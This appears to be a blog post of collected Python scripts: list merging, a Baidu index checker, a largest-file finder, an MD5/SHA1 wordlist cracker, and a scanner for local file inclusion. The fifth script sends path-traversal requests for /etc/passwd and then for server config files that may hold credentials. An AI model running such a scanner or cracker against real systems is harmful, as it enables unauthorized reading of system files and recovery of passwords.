Some Practical Python Scripts [bak]


1. Merging two sorted lists
#!/usr/bin/env python
# coding=utf-8
'''
Suppose there are two sorted lists, list_1 and list_2. How can they be merged efficiently while keeping the result sorted (ascending order is assumed here)?
The idea is simple: compare the first elements of list_1 and list_2, append the smaller one to a new list, and repeat (recursively) until every element has been moved into the new list.
In Python, even tail recursion is not particularly efficient, so to avoid blowing the stack a loop-based version (loop_merge_sort) is usually used instead.
'''
def recursion_merge_sort1(list_1, list_2):
    tmp = []
    if len(list_1) == 0:        # one list is exhausted: take the rest of the other
        tmp.extend(list_2)
        return tmp
    elif len(list_2) == 0:
        tmp.extend(list_1)
        return tmp
    else:
        if list_1[0] < list_2[0]:   # move the smaller head element into tmp
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
        tmp += recursion_merge_sort1(list_1, list_2)
    return tmp

def recursion_merge_sort2(list_1, list_2, tmp=None):
    if tmp is None:  # avoid a mutable default argument, which would be shared across calls
        tmp = []
    if len(list_1) == 0 or len(list_2) == 0:
        tmp.extend(list_1)
        tmp.extend(list_2)
        return tmp
    else:
        if list_1[0] < list_2[0]:
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
        return recursion_merge_sort2(list_1, list_2, tmp)

def loop_merge_sort(list_1, list_2):
    tmp = []
    while len(list_1) > 0 and len(list_2) > 0:
        if list_1[0] < list_2[0]:
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
    tmp.extend(list_1)
    tmp.extend(list_2)
    return tmp
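
A quick usage sketch (the sample lists below are made up; copies are passed because all three functions consume their inputs with del, and heapq.merge from the standard library is shown for comparison):

if __name__ == '__main__':
    import heapq
    a = [1, 3, 5, 7]
    b = [2, 4, 6, 8, 10]
    print(loop_merge_sort(a[:], b[:]))  # [1, 2, 3, 4, 5, 6, 7, 8, 10]
    print(list(heapq.merge(a, b)))      # same result via the standard library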
2. Check whether Baidu has indexed a URL
#!/usr/bin/env python
#coding=utf-8

import requests
from bs4 import BeautifulSoup as bs
import re

headers = {
    'User-Agent': 'Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+GTB7.1;+.NET+CLR+2.0.50727)'
}  # fake a browser UA; rotating several UAs can improve the success rate

def baidu_url(word):  # build the Baidu search URL; only the first 10 results are needed for an index check, and the rn parameter can adjust the result count
    '''
    get baidu search url
    '''
    return 'http://www.baidu.com/s?wd=%s' % word

def baidu_cont(url):  # fetch the HTML of the Baidu results page
    r = requests.get(url, headers=headers)
    return r.content

def serp_links(word):  # get the final landing URLs from the Baidu SERP
    '''
    get baidu serp links with the word  [SERP = Search Engine Results Page]
    '''
    b_url = baidu_url(word)
    soup = bs(baidu_cont(b_url), 'html.parser')  # name a parser explicitly to avoid the BeautifulSoup warning
    b_tags = soup.find_all('h3', {'class': 't'})  # result links sit inside h3 tags with class="t"
    b_links = [tag.a['href'] for tag in b_tags]
    real_links = []
    for link in b_links:  # follow each result with requests to get the final URL instead of Baidu's redirect/snapshot URL
        try:
            r = requests.get(link, headers=headers, timeout=120)
        except Exception as e:
            real_links.append('page404')
        else:
            real_links.append(r.url)
    return real_links

def indexer(url):  # if the URL appears in the SERP link list it is indexed, otherwise it is not
    indexed_links = serp_links(url)
    return url in indexed_links
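
A minimal call sketch (the URL below is purely hypothetical):

if __name__ == '__main__':
    test_url = 'http://www.example.com/some-page.html'  # hypothetical URL to check
    print('indexed' if indexer(test_url) else 'not indexed')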
3. Local dictionary attack on MD5/SHA1
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Filename: py_crackhash.py - crack an md5/sha1 hash by exhausting a wordlist

import sys, getopt, hashlib

if len(sys.argv) == 1:
    print 'Usage: py_crackhash.py -t hashtype{md5/sha1} -h hashcode -w wordfile'
    sys.exit()

opts, args = getopt.getopt(sys.argv[1:], "t:h:w:")
hashtype = ""
hashcode = ""
wordfile = ""

for op, value in opts:
    if op == "-t":
        hashtype = value
    elif op == "-h":
        hashcode = value
    elif op == "-w":
        wordfile = value
    else:
        sys.exit()

w = open(wordfile, 'r')

if hashtype == "md5":
    while True:
        line = w.readline()
        if line:
            y = hashlib.md5(line.rstrip()).hexdigest()
            if hashcode == y:
                print "md5(%s)=%s" % (line.rstrip(), y)
                break
        else:
            print 'NULL'
            break

if hashtype == "sha1":
    while True:
        line = w.readline()
        if line:
            y = hashlib.sha1(line.rstrip()).hexdigest()
            if hashcode == y:
                print "sha1(%s)=%s" % (line.rstrip(), y)
                break
        else:
            print 'NULL'
            break

w.close()
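
An example run, assuming a hypothetical dictionary file wordlist.txt that contains the word "password" (the hash below is the well-known MD5 of "password"):

python py_crackhash.py -t md5 -h 5f4dcc3b5aa765d61d8327deb882cf99 -w wordlist.txt
md5(password)=5f4dcc3b5aa765d61d8327deb882cf99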
4. Multi-threaded search for the 10 largest files under a directory
#!/usr/bin/env python
# coding=utf-8
import os, os.path
from ConfigParser import RawConfigParser as rcp
from threading import Thread, Lock
import sys
import time
MaxCount=10

def insert(tenmax, filename, filesize):  # insert while keeping tenmax sorted by size, descending
    i=0
    while i<len(tenmax) and tenmax[i][1]>filesize:
        i += 1
    tenmax.insert(i, [filename, filesize])

def keepTenMax(tenmax, filename, filesize):  # keep only the MaxCount largest files in tenmax
    i=len(tenmax)
    if i<MaxCount:
        insert(tenmax, filename, filesize)
    else:
        if filesize>tenmax[i-1][1]:
            insert(tenmax, filename, filesize)
            tenmax.pop()
        elif filesize==tenmax[i-1][1]:
            tenmax.append([filename, filesize])
            if len(tenmax)>MaxCount:
                del tenmax[MaxCount:]  # truncate in place; rebinding the local name would not affect the caller's list
        else:
            return

class MyThread(Thread):  # one worker thread per directory
    def __init__(self, root, files, tname):
        Thread.__init__(self)
        self.root=root
        self.files=files
        self.name=tname
        self.tenmax=[]
    def run(self):
        global count
        for f in self.files:
            filename=self.root+os.sep+f
            filesize=os.stat(filename).st_size
            mylock.acquire()  # acquire the lock before touching the shared counter
            count += 1
            mylock.release()  # release the lock
            keepTenMax(self.tenmax, filename, filesize)

def allDone(threadlist):
    for i in threadlist:
        if i.isAlive():
            return False
    return True

#main
if __name__=="__main__":
    global count  # global file counter
    mylock=Lock()  # define a lock
    count=0
    tenmax=[]
    threadlist=[]
    if len(sys.argv)==1:
        wdir='.'
    elif len(sys.argv)==2:
        wdir=sys.argv[1]
    else:
        print 'Usage: findBigFiles.py [wdir]'
        sys.exit()
    tname=1
    begin=time.time()
    for root, dirs, files in os.walk(wdir):
        if files:
            sthread=MyThread(root, files, tname)  # start one search thread per directory
            threadlist.append(sthread)
            sthread.start()
            print 'thread-'+str(tname)+' starts searching dir: '+root
            tname += 1
    for t in threadlist:
        t.join()
    if allDone(threadlist):  # all threads have finished; gather their results
        for i in threadlist:
            tenmax.extend(i.tenmax)
    a=[]  # merge the per-thread top lists into a single sorted top-MaxCount list
    for f in tenmax:
        keepTenMax(a, f[0], f[1])
    tenmax=a
    # print the results and also write them via RawConfigParser to result.txt in the current directory
    print
    print '[=========================threads count', len(threadlist), '====================]'
    print '[=========================tried', count, 'files=======================]'
    print '[=========================the', MaxCount, 'largest files===========]'
    print
    c=1
    myrcp=rcp()
    myrcp.add_section('Result')
    for fname, fsize in tenmax:
        size='%.3fMB' % (fsize/1024.0/1024.0)
        print '[%d]%s-%s' % (c, fname, size)
        myrcp.set('Result', '[%d]%s' % (c, fname), size)
        c += 1
    with open('result.txt', 'w') as f:
        myrcp.write(f)
    end=time.time()
    usetime=end-begin
    print
    print '[=============================================================]'
    print 'all time:%.3fs' % usetime
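
A sample invocation (the directory is just an example; besides the console output, the list is also written to result.txt in the current directory):

python findBigFiles.py /var/log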
5. Probing for local file inclusion (LFI) vulnerabilities
#!/usr/bin/env python
#-*-coding:utf-8-*-

import urllib2
import sys
print ("-----------------------------------------------------")
print ("|         usage: py_detect_LFI.py site_url           |")
print ("| the url looks like http://www.google.com/index.php?id= |")
print ("|      written by eip_0x[Freebuf], just 4 fun        |")
print ("-----------------------------------------------------")

if len(sys.argv) != 2:  # a target URL prefix is required
    sys.exit()

site0=sys.argv[1]+'/kfdsjkf7675637d.txt'  # request a file that does not exist to capture the site's error page
req0=urllib2.Request(site0)
conn0=urllib2.urlopen(req0)
data0=conn0.read()  # full body of the error page, used as the baseline for the length comparison

paths1=['/etc/passwd', '../etc/passwd', '../../etc/passwd', '../../../etc/passwd',
        '../../../../etc/passwd', '../../../../../etc/passwd', '../../../../../../etc/passwd',
        '../../../../../../../etc/passwd', '../../../../../../../../etc/passwd',
        '../../../../../../../../../etc/passwd', '../../../../../../../../../../etc/passwd']
paths2=['/usr/local/app/apache2/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf',
        '/usr/local/app/apache2/conf/extra/httpd-vhosts.conf', '/usr/local/app/php5/lib/php.ini',
        '/etc/sysconfig/iptables', '/etc/httpd/conf/httpd.conf', '/etc/my.cnf', '/etc/issue',
        '/etc/redhat-release', '/usr/local/apache/conf/httpd.conf']

for path in paths1:  # first check whether '/etc/passwd' can be included
    site=sys.argv[1]+path
    try:
        req=urllib2.Request(site)
        conn=urllib2.urlopen(req)
        data=conn.read()
    except urllib2.URLError:
        continue
    if len(data)!=len(data0):  # response differs from the error page, so the file was probably read
        print path, "this file has been found!!!! u r lucky and have fun!!!!"
        for path2 in paths2:  # '/etc/passwd' worked, now try config files that may hold plaintext credentials
            path2ok=path.replace("/etc/passwd", path2)  # replace(old, new[, count]); without count every occurrence is replaced
            site2=sys.argv[1]+path2ok
            try:
                req2=urllib2.Request(site2)
                conn2=urllib2.urlopen(req2)
                data2=conn2.read()
            except urllib2.URLError:
                continue
            if len(data2)!=len(data0):
                print path2, "this file has been found!!"
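
A sample invocation against a purely hypothetical target (the argument is the vulnerable URL prefix up to the include parameter, as shown in the banner):

python py_detect_LFI.py http://www.example.com/index.php?id=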
6. To be continued...

==

Much of the code here was collected while browsing blogs; many thanks to the authors for sharing it so generously. (The sources of some snippets have been forgotten; they will be credited as soon as they are found again.)

